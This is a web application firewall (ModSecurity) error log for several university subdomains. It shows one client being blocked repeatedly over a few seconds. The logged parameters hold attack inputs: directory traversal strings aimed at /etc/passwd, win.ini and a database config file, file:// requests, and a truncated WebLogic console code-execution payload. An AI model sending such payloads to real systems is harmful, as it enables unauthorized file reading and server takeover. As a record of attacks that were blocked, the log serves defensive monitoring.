[Tue Aug 29 11:46:29.808593 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JO4AAAAK"]
[Tue Aug 29 11:46:30.158863 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JsCo-f0AAAib558AAAAA"]
[Tue Aug 29 11:46:30.417297 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JsCo-f0AAAi2yFIAAAAN"]
[Tue Aug 29 11:46:30.528553 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi5uGwAAAAS"]
[Tue Aug 29 11:46:30.546864 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAhtjk8AAAAq"]
[Tue Aug 29 11:46:30.569076 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi5uG4AAAAS"]
[Tue Aug 29 11:46:30.606442 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAhtjlIAAAAq"]
[Tue Aug 29 11:46:30.640014 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjCa8QAAAAB"]
[Tue Aug 29 11:46:30.691454 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjFodoAAAAF"]
[Tue Aug 29 11:46:30.712384 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi5uHMAAAAS"]
[Tue Aug 29 11:46:30.715476 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAjFodsAAAAF"]
[Tue Aug 29 11:46:30.715720 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi0JPQAAAAK"]
[Tue Aug 29 11:46:30.733604 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAi5uHQAAAAS"]
[Tue Aug 29 11:46:30.763362 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14JsCo-f0AAAi0JPYAAAAK"]
[Tue Aug 29 11:46:30.792651 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JsCo-f0AAAhtjloAAAAq"]
[Tue Aug 29 11:46:30.811076 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi0JPgAAAAK"]
[Tue Aug 29 11:46:30.832253 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlwAAAAq"]
[Tue Aug 29 11:46:31.363242 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjIhhgAAAAJ"]
[Tue Aug 29 11:46:31.401191 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjCa8wAAAAB"]
[Tue Aug 29 11:46:31.404561 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjFoeAAAAAF"]
[Tue Aug 29 11:46:31.426934 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14J8Co-f0AAAi0JP0AAAAK"]
[Tue Aug 29 11:46:31.498947 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjH@tMAAAAI"]
[Tue Aug 29 11:46:31.518414 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjH@tQAAAAI"]
[Tue Aug 29 11:46:31.530336 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjCa88AAAAB"]
[Tue Aug 29 11:46:31.531583 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAhtjmMAAAAq"]
[Tue Aug 29 11:46:31.608193 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAhtjmYAAAAq"]
[Tue Aug 29 11:46:31.665715 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14J8Co-f0AAAhtjmgAAAAq"]
[Tue Aug 29 11:46:32.369934 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14KMCo-f0AAAjL8N0AAAAR"]
[Tue Aug 29 11:46:32.373021 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14KMCo-f0AAAi5uIAAAAAS"]
[Tue Aug 29 11:46:32.413517 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAi5uIIAAAAS"]
[Tue Aug 29 11:46:33.359013 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAib56EAAAAA"]
[Tue Aug 29 11:46:33.376148 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAi-RC0AAAAH"]
[Tue Aug 29 11:46:33.376821 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAjH@tsAAAAI"]
[Tue Aug 29 11:46:33.379794 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhT34sAAAAD"]
[Tue Aug 29 11:46:33.380084 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAhZRqMAAAAG"]
[Tue Aug 29 11:46:33.445431 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAfEB@YAAAAO"]
[Tue Aug 29 11:46:33.458915 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjKypsAAAAQ"]
[Tue Aug 29 11:46:33.461576 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjH@t8AAAAI"]
[Tue Aug 29 11:46:33.500075 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjKyp0AAAAQ"]
